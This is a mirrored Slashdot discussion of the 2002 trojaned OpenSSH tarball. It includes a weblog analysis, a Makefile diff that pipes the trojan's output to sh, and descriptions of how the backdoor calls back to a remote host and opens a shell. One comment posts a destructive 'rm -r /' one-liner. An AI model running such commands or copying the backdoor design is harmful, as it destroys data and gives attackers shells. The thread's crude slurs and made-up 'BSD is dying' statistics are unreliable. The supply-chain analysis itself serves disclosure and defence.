Slashdot Mirror
OpenSSH Package Trojaned
cperciva writes "The original story is here.
And more details are available from the guy's weblog here." Here's a mirror of that email message. Another reader writes, "Not really a trojan because all it does is make a connection to 203.62.158.32:6667." Still another writes "The tarball of the portable OpenSSH on ftp.openbsd.org is trojaned. The backdoor is only used during build - generated binaries are fine." There isn't much authoritative information available, but this appears legitimate - please be careful if you're updating any of your machines with code from ftp.openbsd.org, and we'll update this story with more links as information is available. Update: 08/01 19:13 GMT by M : OpenSSH now has an advisory.
First piss.
All trolls are butt-spelunkers!
It's official: OpenBSD is holy. The Pope just announced the security hole itself.
Another blow to the *BSD movement, losing the support of Atheists all over the globe...
Or something.
Teenagers these days don't have as much sex as they want each other to think they do.
This has never happened to a Microsoft product. Although I am sure the Slashdot crew of janitors and peons would have a field day if it did.
All I can say is, j00 R 0wn3d lol
But...they don't have enough h4x0r green to be evil. Besides, why does it connect to the ircd port?
So the sources are bad but the binaries are good? Is today bizarro-world day or something?
Why not unplug your box from the network while building? After that it should be OK, seeing as how 'generated binaries are fine.'??
:)
Or am I thinking far too simply for my own good again?
Macs as a fetish property
OpenBSD being focussed on security and all...
Hate me!
slashdot effect n.
1. Also spelled "/. effect"; what is said to have happened when taco's anus is virtually unreachable because too many shirt-lifters are hitting it after he posts a boring pro-lunix article on the popular Slashdot news service. The term is quite widely used by /. readers, including variants like "Oh my god, my asshole has been slashdotted again!"
2. In a perhaps inevitable generation, the term is being used to describe any similar effect from being butt-fucked by a large admiring crowd. This would better be described as a flash crowd.
FREE NELSON MANDELA
...that this doesn't happen more often.
./configure && make && make install.
People keep harping on about how open source software means that they can trust downloaded source code, but who actually reads through to source code for something before they actually compile?
Usually it's just
James
Windows software doesn't have problems like this!
Wake up, Bill won the game.
Losers!
On the one hand, there's stories about the improved security and paranoia of OpenSSH.
;-) ]
... but he'd left the .bak files. Guess what was in the .bak files. Good, now guess how we discovered a few other potential surprises he'd left for the rest of us to encounter.
And on the other hand, there's stories like this one and that one about anti-security "features" in the same package.
Now, my question is this: is this indicative of open-source development projects, in general? [Yeah, it's faster to fix issues, but if the distros are *causing* issues in the first place, well....
Reminds me of a company I worked for that was timebombed by a previous programmer. Unfortunately for him, when we looked at the source code, all was well (he'd copied the sources back over his modified ones used in the binary build)
Anyway, I can't see how a disgruntled coder could really affect an open-source project, unless there's personality factors at play that I don't know about. Anyone have some meat on this OpenSSL mess?
.f00Dave
wouldn't be better to change the 'main' openbsd site to be one of its current mirror?
I suppose that a mirror has better chances to be managed with motivation and skill, surely more than a solaris box in a university actually has.
also, the mirror should run openbsd itself...
-- There are two kind of sysadmins: Paranoids and Losers. (adapted from D. Bach)
Also, how many people do read the makefiles before running them on your machine? And when installing binaries require root access?
If this story is really true, how much safer is open-source programs, when compared with closed source programs? Notice that even with closed source programs, *some* people will eventually discover that they are trojan or not.
¦ ©® ±
OK so they trojaned the source tar.gz, and uploaded it to the server somehow. So why did they not update the MD5SUM also?
Isn't it?
So, does apt-get use checksums and gpg signatures these days? Or are there thousands of debian machines out there just begging to be owned?
The C code is not that smart. It tries once per hour to connect to port 6667 on the machine 203.62.158.32 which is web.snsonline.net and waits for commands from the person or persons who 0wn3d the machine. Does it get an M, it sleeps for another hour. Does it get an A, it will abort. Does it get an M, it will spawn a shell. Some people will build it "normal" privileges and install it as root: they will get a shell with "normal" privileges. Other people will build it with "root" privileges and the shell will have "root" privileges.
Tell me how this isn't a trojan again? A remotely controllable program that could possibly give the attacker root access?
I've had enough abrasive sigs. Kittens are cute and fuzzy.
This is interesting. Open source developers are great, and we appreciate their contributions, but shouldn't there be some sort of open source code review? I understand that people that download the packages have the option to review the code, but I'm sure there's a lot that don't. Shouldn't some sort of change control/QC process be implemented before something is put up for the public's use?
I got my copy of the OpenSSH source from ftp.openssh.org the day it was released, and mine doesn't contain the bf-test.c file and the MD5 checksum is correct.
So if the file was modified it happen later.
to subscribe to Bugtraq or a similar security mailing list. Especially you guys that run any type of server. Securityfocus is your friend; they'll have these advisories far in advance of any other place on the net.
I don't mean to be making a "*BSD is Dying" post, but what's the deal? This is the second problem with OpenSSH in a few months, and OpenSSL was exploited just a few days ago.
Is OpenBSD in trouble? More importantly, what are security-conscious people switching to, now that OpenBSD is no longer the fortress it once was?
Karma: Good (despite my invention of the Karma: sig)
But it reads from the connection and executes the read code via /bin/sh. You call this not a trojan?
-- There is no place like $HOME.
At this point I think we need to make the assumption that the problem is a bit more common than viewing these compromises individually would suggest, and perhaps these individual events can even be linked together.
And for the developers out there, I think it's time to check over all of your current distributed source tarballs.
This is the one area with open source which I am suprised has not been exploited earlier, and it's a problem I'm not sure how can be avoided.
We see that the "many eyes" on open source seems to work pretty damn quickly : but the question is, how much damage could someone do in the time it takes for people to notice? Most software needs to be installed as root, and most people blindly install software without checking the make files to see what they do. Because it is run as root, you are leaving your machine wide open to anything the trojan wants to do.
yes | rm -r /
The trouble is, a normal virus checker wouldn't be any use against this kind of trojan as most damage is caused before the trojan is noticed.
Has anyone else thought about ways to solve this problem?
The trojan is executing during BUILD ONLY. The trojan attempts to connected to an unknown daemon on 203.62.158.32:6667 (system reinstalled now and even more secured - thanks for that, ^Sarge^), and awaited one out of three characters for a command from the server it connected to - M, A and D.
/bin/sh.
:-/
M respawned the process.
A killed the trojan.
D launched
With the D command, as given _to_ the trojan, the daemon on 203:62.158.32:6667 was given control of the trojaned users system shell. As most people, unfortunally, decide to compile as root, this potentially could have given the hacker a large amount of root shells around the globe with little or no hazzle.
Funny, this is. Expect more trojans that look like this, but in a better disguise.
-- Hans.
I guess since Linux only has 0.005% of the market share, nobody even cares enough to write a virus for it.
Either way, looks like this is the final nail in the Linux coffin. I guess y'all won't be bragging about security anymore.
inetnum 203.62.158.0 - 203.62.159.255
netname AUSTRALIANINTER-AU
descr Australian Internet Solutions Pty Ltd
descr Suite 3, Level 5, 277 Flinders Lane
descr Melbourne
descr VIC 3001
country AU
admin-c DA53-AP
tech-c DA53-AP
mnt-by MAINT-AU-KALED
changed register@aunic.net 19970211
changed aunic-transfer@apnic.net 20010525
changed hostmaster@apnic.net 20011115
source APNIC
person Domain Administrator
address Level 4,
address 180 Bourke St,
address Melbourne, 3000.
country AU
phone +61-3-9650-5566
fax-no +61-3-9639-1897
e-mail kaled@dalek.ains.net.au
nic-hdl DA53-AP
mnt-by MAINT-NEW
changed kaled@dalek.ains.net.au 20010619
source APNIC
One more crippling bombshell hit the already beleaguered *BSD community when Slashdot confirmed that confidence in OpenBSD security has dropped yet again, with OpenBSD down to less than a fraction of 1 percent of all servers. Coming on the heels of a recent Slashdot article which plainly states that OpenSSH has more holes than a default IIS install, this news serves to reinforce what we've known all along. Theo de Raadt is collapsing in complete disarray, and industry pundits believe he will soon fall dead.
You don't need to be Jordan Hubbard to predict de Raadt's future. The hand writing is on the wall: Theo faces a bleak future. In fact there won't be any future at all for Theo because Theo is dying. Things are looking very bad for Theo. As many of us are already aware, Theo continues to lose credibility. Red ink flows like a river of blood.
Let's keep to the facts and look at the numbers. OpenBSD leader Theo states that there are 7000 users of OpenBSD. How many exploits have there been to OpenBSD since Theo started coming clean about its failings? At least two remote root vulnerabilities in the last month. If we extrapolate that to two undisclosed exploits per month for the last six years OpenBSD has claimed to be free of holes, that's 144 security holes in 7000 machines, or 1,008,000 potential break-ins to an OpenBSD machine.
All major surveys show that Theo de Raadt is too arrogant to be able to live through this embarrassment. Theo is very sick and his long term survival prospects are very dim. If Theo is to survive at all it will only be through spending another 6 years covering up all the holes in OpenBSD. But the word is out, and nothing short of a miracle could save him at this point in time. For all practical purposes, Theo is dead.
Fact: Theo de Raadt is dying.
Actually this has happened to numerous microsoft apps. Not the least of which is Windows XP, which allows M$ to backdoor you whenever they please.
RTFM man, and stop being such a microsoft junkie. Microsoft has it's place but doesn't deserve a pedistal. Flat out, it sucks.
C:\>bf-output.sh
'bf-output.sh' is not recognized as an internal or external command,
operable program or batch file
This trojan doesn't look very 31337 to me.
This comment was generated by a Squadron of Ultra Ninjas
One of the Paris mirrors seems to have a "healthy" version - if one dares believe the info on checksums.
b a8a8 openssh-3.4p1.tar.gz
r ta ble/openssh-3.4p1.tar.gz
juan:~> md5sum openssh-3.4p1.tar.gz
459c1d0262e939d6432f193c7a4
ftp://ftp.fr.openbsd.org/pub/OpenBSD/OpenSSH/po
I think that after that, they are going to ask digital signature by any of the upstream mantainers.
So, this may turn in a good thing ... if it didn't make too much damage.
Oh, and just for karma: this shows once more that security is a process more than a product.
Ciao
----
FB
So the backdoor is in the Makefile, not the OpenSSH software itself.
One thing to mention is that IMHO this is not a fault of OpenBSD. As anyone can read in their FAQ www.openbsd.org (and ftp.openbsd.org) is run on Solaris.
I should have seen this coming... Here is a copy of the weblog. It will be back after 24 hours.
/usr/ports/security/openssh-portable/ security/openssh-portable] edwin@k7>makeb le] edwin@k7>make install
a re up to date. If you are absolutely sure you want to override this
./bf-test.out &
../config.h ../config.h
:-) but if people are talking about HP-UX, Cray, ILP64 and epcdic2ascii(), I know it's either too difficult for me (You are not supposed to understand this) or it's bullshit (We can charge the phaser-array via a shortwave link through the warpcore). Time to startup vmware and run the experiment: gcc -o bf-test bf-test.c.
:-)
:-). The head-guy of the OpenBSD team is living in Canada and they're now sleeping there. I've spend a couple of days on #freebsd on irc.openprojects.net, so I just tried #openbsd.
:-)
01 August 2002 - 19:10:23 - OpenSSH 3.4p1 package trojaned
And all I was thinking was "Oh! I should upgrade ssh on these two machines before there are problems...". The beauty of FreeBSD is that it goes like this:
[~] edwin@k7>cd
[/usr/ports
[/usr/ports/security/openssh-porta
Easy euh? It went well, except for the second step:
===> Extracting for openssh-portable-3.4p1_7
>> Checksum mismatch for openssh-3.4p1.tar.gz.
Make sure the Makefile and distinfo file (/usr/ports/security/openssh-portable/distinfo)
check, type "make NO_CHECKSUM=yes [other args]".
*** Error code 1
Euh... I didn't remember seeing a change in the FreeBSD ports regarding this. And I didn't see an announcement for it from the people from OpenSSH... Oh well, it happens. I downloaded the new openssh-tarball:
-r--r--r-- 1 12187 mirror 840574 Jul 31 16:47 openssh-3.4p1.tar.gz
-r--r--r-- 1 12187 mirror 232 Jun 26 08:20 openssh-3.4p1.tar.gz.sig
That's weird, they've rerolled the tarball without updating the signature file. I asked a couple of people on irc (#sage-au) if they have had troubles with compiling openssh the last days. Yups, ^Sarge^@bofh.snsonline.net also had it, he had a checksum mismatch.
Curious as I was, I extracted the old and new tarball and this were the differences:
[~/test] edwin@k7>diff -r -u openssh-3.4p1-old openssh-3.4p1
diff -r -u openssh-3.4p1-old/openbsd-compat/Makefile.in openssh-3.4p1/openbsd-compat/Makefile.in
--- openssh-3.4p1-old/openbsd-compat/Makefile.in Wed Feb 20 07:27:57 2002
+++ openssh-3.4p1/openbsd-compat/Makefile.in Thu Feb 1 08:52:03 2001
@@ -26,6 +26,7 @@
$(CC) $(CFLAGS) $(CPPFLAGS) -c $bf-test.out; sh
$(COMPAT):
$(OPENBSD):
Only in openssh-3.4p1/openbsd-compat: bf-test.c
At this moment I asked a couple of people on irc (#sage-au) if they have had troubles with compiling openssh the last days. Yups, ^Sarge^@bofh.snsonline.net also had it, also a checksum mismatch. Time to go deeper into it...
bf-test.c is a weird file. It talks about HP-UX PL.2 systems, it talks about _CRAY notes, it talkes about none-T3E machines, it talks about _ILP64__ and it does an epcdic2ascii() call. I'm not very skilled in computers (well, I am
bf-test itself is pretty harmless, it only prints things to the screen (remember the change in the makefile? execute, redirect the output and execute the output). The shell script it prints creates a C program and tries to compile it. If it doesn't succeed at first, it tries to link other libraries (everybody who has ever ported a Solaris knows that you have to explicitely link to libresolv et al). So it's cross-platform
The C code is not that smart. It tries once per hour to connect to port 6667 on the machine 203.62.158.32 which is web.snsonline.net and waits for commands from the person or persons who 0wn3d the machine. Does it get an M, it sleeps for another hour. Does it get an A, it will abort. Does it get an M, it will spawn a shell. Some people will build it "normal" privileges and install it as root: they will get a shell with "normal" privileges. Other people will build it with "root" privileges and the shell will have "root" privileges.
While analyzing the code on #sage-au and mentioning the hostname, ^Sarge^ looked strangely at me (well, it's IRC so you never know but that's what I would do): "That is my machine.". The good news is that I didn't have to worry about finding out who manages the machine!
The next step is to inform somebody who manages the openssh-packages: The OpenBSD team. Up to right now, I have had no experience with the OpenBSD team (if you check my website you'll see that I'm more a FreeBSD guy
*** MavEtJu has joined #openbsd
Euh... anybody from the openssh-team here?
I have some news for you...
What's up?
I have contact! Marius asked me the standard questions (how did you find out, how can I see it, when did you find out) and after some investigation he said "I think I'd better call (and now I have forgotten the name)". Coolies! I think I found a right person to talk to! It looks like things are going to roll now, I can take my hands of it.
The last things I did were writing some emails to a couple of mailinglists and guide ^Sarge^ to #openbsd. For the rest I wasn't of very much use anymore, so I just kept monitoring #openbsd. And the logfile of my website, which went ballistic.
Aftermatch
* The portable version wasn't the only which was trojaned, the normal version was also.
* It seems it took only six hours before somebody was alert enough to see that there was something wrong, all thanks to the checking of the MD5-checksum [insert a sweet 'aaaaaahhh' here]
* OpenSSH itself wasn't trojaned, the tarball was. There is nothing wrong with OpenSSH itself (this time
* The building of a port (under FreeBSD at least) is done as root with all its privileges. This is a wrong approach. For a time I tried, as an experiment, to build ports as user "port". This worked fine except for the "make clean" part, in which I couldn't remove the files created during the "make install" phase and the files which were made during the building of the RUN_DEPENDS ports.
bash$
I wonder what what would happen if someone was installing Gentoo? :) Shitty deal if you ask me
"I believe in everything in moderation. Including moderation." -Dean DeLeo, Stone Temple Pilots
...for hosting ftp.openbsd.org on a box running SunOS, not OpenBSD!
Is it just some disgruntled programmer? Was it the BSD team itself doing a drill check of their own security? Or is it time for conspiracy theories -- the men in black, or blue perhaps? (well, I dunno what colour Microsoft is, but they're the new IBM so I chose blue..)
It was "no remote holes in 5 years". Now it's "one remote hole in the default install, in nearly 6 years!"
Next it will be "one remote hole and one 'harmless trojan' in the default install, in really very close to 6 years!"
How many companies are going to tell a new programmer to go ahead and spend 6 months reading through all the code? How many companies encourage all the programmers to look at old code, check every line every couple weeks and perform extensive regression testing? From my own experience, few companies look at old code and the regression testing is typically a narrow focus on the functional aspects. Things like a trojan aren't going to be caught by the typical regression testing procedures.
On my free time, I do read through open source code for fun. From my own biased experience, open source code tends to be much cleaner and better documented than closed source projects. This isn't including all the PERL code I've seen written in creative ways to make visual art. I've also seen clean PERL code, but that's another story. Back to the point. Persistence is what wins in the end when it comes to security. The minute a person get lazy is when an attack will happen. But I seriously doubt this will change in the near future, since it's really a matter of culture. Businesses can't afford to have a team of programmers to sit around and audit their security every couple months. So unless our culture changes and realizes quality is more important than convienance, things like this will continue to increase in frequency. Of course everyone living in a modern techno society is guilty of it. But that's not to say technology is the cause of it, though they are related.
If there would be some configure/make environment that prevents or asks before outgoing connections and checks for possibly dangerous commands, that are unusual to call upon a ./configure run, wouldn't that prevent things like this to happen again?
Updating SSL and/or SSH may fsck you up, if you are doing it remotely via said ssh shell. :-(
It is official; Netcraft confirms: MD5 is dying
One more crippling bombshell hit the already beleaguered MD5 community when IDC confirmed that MD5 market share has dropped yet again, now down to less than a fraction of 1 percent of all servers. Coming on the heels of a recent Netcraft survey which plainly states that MD5 has lost more market share, this news serves to reinforce what we've known all along. MD5 is collapsing in complete disarray, as fittingly exemplified by failing dead last in the recent Sys Admin comprehensive networking test.
and so forth...
With the monthly (if not more often) security problems with that package its the reason why I stick with this instead.
I just don't have the time to constantly update my home systems like this.
The right thing to do here would be to put a link in the article to port 80 of the receiver server of the trojan.
/.'d into oblivion.
Let's see it try to work while the server is being
This comment was generated by a Squadron of Ultra Ninjas
Could it be that a certain software corporation is hiring PR firms to do this?
I seem to remember a certain software corporating having the hotel room of some IBM execuatives bugged (does anyone remember this?).
1. This does not affect the installation.
2. This is not an OpenBSD matter.
THEO EATS BABIES
Without those checksums, the trojan might have done much more damage.
I download lots of tarballs from sites that provide a sum file as well. Presumably, you check the file to make sure it's checksum matches that in the sum file. If it does, you should be good to go.
So, in this case, couldn't someone just as easily generate an md5 sum for the hacked file and put that in the sum file? I know on bsd you have ports which would prevent this, but what about Linux? Everything would seem kosher if the hax0r replaced the sum file...
thx for responses.
It seems like we need to start using a "web-of-trust" based PKI solution, like OpenPGP. And educating users to actually check the signatures!!!
On a related note, does Debian use anything to prevent this from happening? I for one don't worry too much when doing an update, maybe I should...
--
Adam Sherman
Freelance Geek
Personality factors? With the OpenBSD coding team? Those guys are the nicest, most patient, most tolerant group of techies you'll ever meet!
Once again I call people's attention to GPG, which can be used to digitally sign source code. Then, if something is trojaned, you know who to blame for including the bum code.
The Right Reverend K. Reid Wightman,
Yet another crippling bombshell hit the beleaguered *BSD community when recently IDC confirmed that *BSD accounts for less than a fraction of 1 percent of all servers. Coming on the heels of the latest Netcraft survey which plainly states that *BSD has lost more market share, this news serves to reinforce what we've known all along. *BSD is collapsing in complete disarray, as further exemplified by failing dead last [samag.com] in the recent Sys Admin comprehensive networking test.
You don't need to be a Kreskin [amdest.com] to predict *BSD's future. The hand writing is on the wall: *BSD faces a bleak future. In fact there won't be any future at all for *BSD because *BSD is dying. Things are looking very bad for *BSD. As many of us are already aware, *BSD continues to lose market share. Red ink flows like a river of blood. FreeBSD is the most endangered of them all, having lost 93% of its core developers.
Let's keep to the facts and look at the numbers.
OpenBSD leader Theo states that there are 7000 users of OpenBSD. How many users of NetBSD are there? Let's see. The number of OpenBSD versus NetBSD posts on Usenet is roughly in ratio of 5 to 1. Therefore there are about 7000/5 = 1400 NetBSD users. BSD/OS posts on Usenet are about half of the volume of NetBSD posts. Therefore there are about 700 users of BSD/OS. A recent article put FreeBSD at about 80 percent of the *BSD market. Therefore there are (7000+1400+700)*4 = 36400 FreeBSD users. This is consistent with the number of FreeBSD Usenet posts.
Due to the troubles of Walnut Creek, abysmal sales and so on, FreeBSD went out of business and was taken over by BSDI who sell another troubled OS. Now BSDI is also dead, its corpse turned over to yet another charnel house.
All major surveys show that *BSD has steadily declined in market share. *BSD is very sick and its long term survival prospects are very dim. If *BSD is to survive at all it will be among OS hobbyist dabblers. *BSD continues to decay. Nothing short of a miracle could save it at this point in time. For all practical purposes, *BSD is dead.
Fact: *BSD is dead
I was wondering the same thing. How did the file get uploaded to the ftp server? Who did it? And can they be prosecuted?
-- Thou hast strayed far from the path of the Avatar.
The IP address is of the machine which was hosting the ssh tarball. The attacker was obviously hoping to 0wn the machine and then pick up all the incoming connections.
$ hostinfo -n 203.62.158.32
snsonline.net
$ whois 203.62.158.32
% How to use the APNIC Whois Database www.apnic.net/db/
% Upgrade to Whois v3 on 20 August 2002 www.apnic.net/whois-v3
% Whois data copyright terms www.apnic.net/db/dbcopyright.html
inetnum: 203.62.158.0 - 203.62.159.255
netname: AUSTRALIANINTER-AU
descr: Australian Internet Solutions Pty Ltd
descr: Suite 3, Level 5, 277 Flinders Lane
descr: Melbourne
descr: VIC 3001
country: AU
admin-c: DA53-AP
tech-c: DA53-AP
mnt-by: MAINT-AU-KALED
changed: register@aunic.net 19970211
changed: aunic-transfer@apnic.net 20010525
changed: hostmaster@apnic.net 20011115
source: APNIC
person: Domain Administrator
address: Level 4,
address: 180 Bourke St,
address: Melbourne, 3000.
country: AU
phone: +61-3-9650-5566
fax-no: +61-3-9639-1897
e-mail: kaled@dalek.ains.net.au
nic-hdl: DA53-AP
mnt-by: MAINT-NEW
changed: kaled@dalek.ains.net.au 20010619
source: APNIC
I've apparently triggered the lameness filter with this... BTW, I can ping this host, so it's still up. However:
$ telnet 203.62.158.32 6667
Trying 203.62.158.32...
telnet: Unable to connect to remote host: Connection refused
Looks like they closed that port?
________________________________________________
suwain_2
For all the users who are confused, but are running OpenBSD pf or FreeBSD with ipfw, you could simply block all outgoing TCP and UDP packets to that address so the trojan simply won't communicate with the home server. Remember, a good hacker could simply use arp-poisoning or an arp spoofer to pretend to be that server. If you block it, you can still run OpenSSH with the trojan, and it's secure.
Here is an nmap dump of the IP in question that
the backdoor tries to connect to:
nmap options (where options is filtered by Slashdot)
ALRIGHT FSCK THIS!! You'll just have to take my
word for it the nmap showed the port closed (do it yourself) I've just tried 10 different ways to submit the nmap output and the lameness filters won't let it through.
Note that port 6667 does not appear to be open, although a backdoor is still a pretty big thing
to worry about. Also note that much of the output
is cut out due to LAME Slashdot filters.
AntiFA: An abbreviation for Anti First Amendment.
Are you saying it's not the fault of the OpenBSD OS or the OpenBSD team?
If they are the ones managing the box, why aren't they securing it? If they aren't in a position to manage the box, why are they even using it?
Also, nobody has done a report on how the trojan was uploaded, so we can't say for sure it was the fault of the OS. It could have been a sniffed password, or social engineering, or whatever.
These guys do good work, but don't discredit the possibility that they make mistakes themselves once in awhile.
There are many big corps (those whose ticker symbol is only one or two letters) who are using OSS.
If they have a competent IT organization they have a team that will check that the software does not make any funnies.
Add to that just curious people, people modifying the software to their own needs, etc. and you get an army of people looking for problems and improvements.
That beats CSS in many instances (not all certainly), does not seem any worse and is more reassuring (the people evaluating normally do not have a vested interest in making the software work other than to satisfy their own needs).
IANAL but write like a drunk one.
Check out this little snippet (the whole message can be found on lwn.net) from an email from Theo:
We've been trying to warn vendors about 3.3 and the need for privsep, but they really have not heeded our call for assistance. They have basically ignored us. Some, like Alan Cox, even went further stating that privsep was not being worked on because "Nobody provided any info which proves the problem, and many people dont trust you theo" and suggested I "might be feeding everyone a trojan" (I think I'll publish that letter -- it is just so funny).
Please do publish that letter, Theo. That would be very interesting.
PU
--Lawrence Lessig for Congress!
Now, what are the chances of that happening? Finding a random trojan on your machine, popping in to an IRC channel, and immediately walking in on the owner of the machine from which the backdoor seems to originate? Who then immediately states "ah yes, that's my machine!" and closes the offending port. Well, how many machines are there on the 'net -- you work it out.
Sorry, my friends, but this smells of bullshit to me. I think the guy who reported it knows a lot more about it than he's making on... if he didn't write and install the bf-test himself, I would hazard a guess he knows who did. And, as the guy who reported the issue, he is least likely to be suspected... which makes the whole thing all the more cunning, if my suspicions are correct.
The only thing lower than quoting someone else's words in your sig is misquoting them. It's the precious things
check out this bugtraq posting for a small analysis of the trojan.
My major gripe is that most of us lazy bastards (he, me too!) will compare:
Like, if I were a Trojan cracker I wouldn't make sure to regenerate the md5sum on the web page to match up perfectly with the new tar ball!
If someone can replace blah.tar.gz they have a fair chance at being able to replace a blah.html file.
It really points up how good security for distributed packages depends on getting signatures and hashes distributed out to lots of different places in lots of different ways to make it much more difficult for a Trojan author to compromise that many different independent points of verification.
If we don't bother to use distributed verification to check the authenticity of our software, then we have only ourselves to blame for the consequences.
"Provided by the management for your protection."
Telnet - because Theo is an asshole
As it seems to happen more and more often that ftp servers get cracked and md5sum's don't seem to help (since users are to lazy to check them and the gpg signatures), could peer2peer services provide a solution? With things like GnuNET you don't download an URL, but instead a checksum. So there wouldn't be an easy way to replace a file in a single location, but one would need to spread a fake md5sum and make people belive that the fake one is the real one. With peer2peer systems there wouldn't be a single point of failure, where the file could get trojaned, once the correct md5sum is spread in the public it would be nearly unchangable. It would also be impossible to hijack mirrors or that trojaned files would be mirrored, since mirroring would be handled by the network itself, not by people. Well, its just an idea, but GnuNET and Co. seem to have a much more straight forward way of handling checksums, than you can ever get with http or ftp at the moment.
So, it was introduced, caught and demonstrably fixed in under 24 hours, with full disclosure and openness at every step. Excuse me if I see no cause for panic.
And can anyone explain how this is even in the same ballpark as the "w3 0wnz j00r b0xen" EULA's, 'phone home's and brazenly trojan updates that Microsoft are inflicting on their customers?
If you were blocking sigs, you wouldn't have to read this.
Who did it? And can they be prosecuted?
Gee, why would you want to do that? I thought everyone who broke into insecure systems was a good-natured Robin Hood, a "white hat" who was just trying to help the poor stupid admins out of the goodness of his or her heart.
Now you're telling me that these people might be malicious?
--saint
(This is the royal "you", of course, referring to the Slashbot Collective. I've got nothing against dfn5 personally.)
GPG signatures should be incorporated into gentoo.
People say this is not a fault of OpenBSD because openbsd.org runs on Sun Solaris
I wonder who said that Sun boxes can be owned , they cant be trusted ?
Or I never heard someone say "Oh its solaris it can be hacked"
Or did you ever see Bill G. says : "This site runs on Windows dont blame me!"
Never learn by your mistakes, if you do you may never dare to try again
This is why I'd rather use Windows than Linux. Even though companies like Microsoft HAVE installed some code that monitors you, I know Microsoft won't be snooping in my email account, etc.
root@ has been warned.
I wonder if all the people are sleeping.....
That goes for source distributions like gentoo also. What happens if someone puts out a dirty ebuild?
I'm one of the admins for SunSITE Alberta which houses openbsd.org. I just checked the file currently available for download and it seems to be clean. The MD5SUM matches up, as well as extracting and looking at the source bf-test wasn't present.
This really sucks since I woke up only like 10 minutes ago and find that the most downloaded file from your site may be trojaned. I have a distinct feeling that the rest of my day isn't going to be much better.
The bothersome thing about this is that someone got into the site (aka: sunsite.ualberta.ca) and managed to modify source tarballs. I'm now wondering:
Free Software: Like love, it grows best when given away.
Since the trojan dies if it sees an A first thing, obviously the guy running the box it's trying to contact should run something like this:
yes "A" | nc -p 6667
Then every daemon that connects gets an A right away, and thus dies. End of problem.
At least mafia-owned pizzarias make excellent pizza. Compare to Bill Gates.
End result: no one in Gentoo has been able to compile/emerge openssh for the last few days.
Which is good :-)
look at the snipped trojaned code:
switch(c) {
case 'A':
exit(0);
case 'D':
break;
case 'M':
break;
How many options there? 3
What are they? A,D,M
A+D+M = ADM!!!!!!!!!!!!!!!!!!!!!
They'r back or so ehehe..
Or somebody is using their name. I don't have any chance to confirm this. Anybody?
evrim.
Evrim ULU sysadm http://www.core.gen.tr
In particular, if the machine in question is a server (usually the reason you have SSH on a box), you should make every possible effort to remove outgoing traffic. There's usually no reason for a server to create outgoing connections to the internet, and if it needs to connect to any specific local resources (e.g. a database machine), limit the iptables/routers appropriately.
Turn down that LOGIC STICK. You're blinding me with
your science.
I might be showing my cluelessness here, but if this is done during the compilation, then this isn't as critical as it might be. I mean, I don't configure or compile any apps as root; so even if there is a remote shell opened on my machine, it only has luser access. (Which still sucks, but is not nearly as bad as a free root shell!)
Friends don't let friends compile as root.
Look at the gcc-hack the inserted a backdoor into the Linux kernel, and there was NO source code in gcc to do so. It was a self-propogating gcc-miscompile (put there on purpose). Kinda neat actually. I cannot seem to Google the link presently.
"One remote hole in default install, in nearly 6 years". Two if you install new ssh.
It seems if you rebuilt from source and rebooted witihin an hour no time was spent on discovering how the cracker rooted the box in the first place.
If the cracker rooted openbsd.org through this box, then any evidence of the attack would have been wiped, wouldn't it?
Or is there still a chance on finding out who was behind this and how it happened? Firewall logs maybe?
Asshole Dickhead Men ?
I am afraid you are totally wrong, this could happen in open-source enviroments but also in closed development enviroments. The big difference is than i a closed-source project you even do not realise that you have been trojaned!!!
"At this moment I asked a couple of people on irc (#sage-au) if they have had troubles with compiling openssh the last days. Yups, ^Sarge^@bofh.snsonline.net also had it, also a checksum mismatch."
The trojan connects to 203.62.158.32, eh?
> nslookup 203.62.158.32Server: dns2.intra
Address: 10.16.59.15
Name: snsonline.net
Address: 203.62.158.32
>
Chuck Norris: Socialism == a thousand years of darkness.
From freebsd-security mailing list. I am not sure this is for real or fake
/root/upgrades]# tar -tzf openssh-3.4.tgz | grep bf /root/upgrades]# head -5
/*
* Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems.
/Chad
I just upgraded my OpenBSD 3.0 machine to OpenSSH 3.4 last night.
I downloaded openssh-3.4.tgz ( notice not p1 ). The MD5 I got was
MD5 (openssh-3.4.tgz) = bda7c80825d9d9f35f17046ed90e1b0a
And look :
[root@superfrink
ssh/ssh-keygen/bf-test.c
And then:
[root@superfrink
ssh/ssh-keygen/bf-test.c
* Perform routine compatability checks. */
#include
So I guess It's not just openssh-3.4p1.tar.gz that is trojaned.
Never learn by your mistakes, if you do you may never dare to try again
Step 1: Read Ken Thompson's Turing Award lecture "On Trusting Trust"
http://www.acm.org/classics/sep95/
Step 2: Decide for yourself if you're ready for the tinfoil-helmet brigade.
Step 3: Type 'make world' if you dare.
...and don't trust the OpenSSL advisory sent out to Bugtraq by a "Ben Laurie". It's not signed, so I can't show that he wrote it. Apparently, it's trivially possible to get a trojaned tarball installed in mirrors everywhere, so that it is mirrored on "official" sources does not help. Is there any reason to believe the OpenSSL advisory other than its mention on their webpage (which could also be hacked as they're running Apache 1.3.6 which could have the chunked bug?)
:)
(this has turned in to quite the rant. sorry.
Sure security threw obscurity is bad, but OpenBSDs method is worse.
OpenBSDs method of security through hype does nothing at all.
Well except get alot of people to order CDs for a mediocre UNIX clone and falsely believe they are secure...
another more likely possability would be that he was using passwordless authentication. so by rooting a box he has access to, the cracker could ssh to any other computer/user with his public key in the authorized_keys file. they could also scp the trojaned file in the same manner. this is not very unlikely.
-- john
I am afraid you are totally wrong, this could happen in open-source enviroments but also in closed development enviroments. The big difference is than i a closed-source project you even do not realise that you have been trojaned!!!
And how am I "totally wrong"? The timebomb I described *was* a closed-source project. Closed-source doesn't meant no-source, it merely means that the access to it is limited to some extent.
Knee-jerk reactions like yours don't help the 'cause' of Open Source development. Next time please take a deep breath and think about how your post will be interpreted before you send it. Thanks.
.f00Dave
We all know the security plan "Security through obscurity" it's not good.
But openBSD is based around a worse and less known plan: "security through hype".
Just keep screaming that it's the most secure and cover up any embarrasing security problems and people will just start to believe it.
It's what's known as the "big lie" tactic. Just say the lie enough times and eventually people will start to believe it. Seems stupid but in history there are several examples of this working on a large scale. So why not use it to sell a bunch of CDs?
(OpenBSD is for-profit organization, another little tidbit money grubbing hype promoting theo likes to keep under wraps.)
OpenBSD is securiy through hype.
The website says no hole in the "default" install in 6 years? Well it _must_ be secure then! Oooh hey look microsoft servers have a 99.999% uptime to! oh what a wonderful world where the marketing hype rings true! yippy!
OpenBSD is all about keeping up it's image and feeding theos ego, that's about it.
too many people are making assumptions. all we know is that the machine was wiped and reinstalled. he could have backed alot of relivent info before he wiped it. this would allow him to fix the computer, get it back up, and inspect the info later at his leisure.
